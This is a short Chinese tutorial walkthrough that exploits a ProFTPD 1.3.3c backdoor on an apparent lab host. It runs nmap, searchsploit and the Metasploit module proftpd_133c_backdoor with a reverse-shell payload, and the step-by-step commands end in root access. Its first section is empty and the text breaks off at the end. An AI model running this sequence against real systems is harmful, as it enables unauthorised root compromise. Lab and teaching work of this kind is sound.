一、基础知识
二、开始渗透
老方法当然是查看主机开放的端口服务:
root@kali:~# nmap -sV 192.168.1.105
我们开放了21号端口,看到了ftp的版本号。
searchsploit +版本
path就是漏洞说明文件和漏洞利用文件:
ruby语言的文件。后缀为.rb,在这里我们可以用编辑器leafpad打开。
msf > search ProFTPD 1.3.3c //我们查看漏洞利用模块
选择漏洞利用模块:
msf > use exploit/unix/ftp/proftpd_133c_backdoor
这里有个疑问为什么我们要选择倒数第二个模块?因为我们可以看看后面的漏洞描述与我们一开始searchsploit查看的漏洞描述信息一样,所以我们就是用这种模块。
查看payloads
msf exploit(proftpd_133c_backdoor) > show payloads
设置payload:
msf exploit(proftpd_133c_backdoor) > set payload cmd/unix/reverse
查看参数:
msf exploit(proftpd_133c_backdoor) > show options
设置对应的参数:
设置参数的时候一定要分清目标端口,本地端口,目标ip,本地ip
执行漏洞:
msf exploit(proftpd_133c_backdoor) > exploit
我们看到直接拿到了root权限。
metasploit中的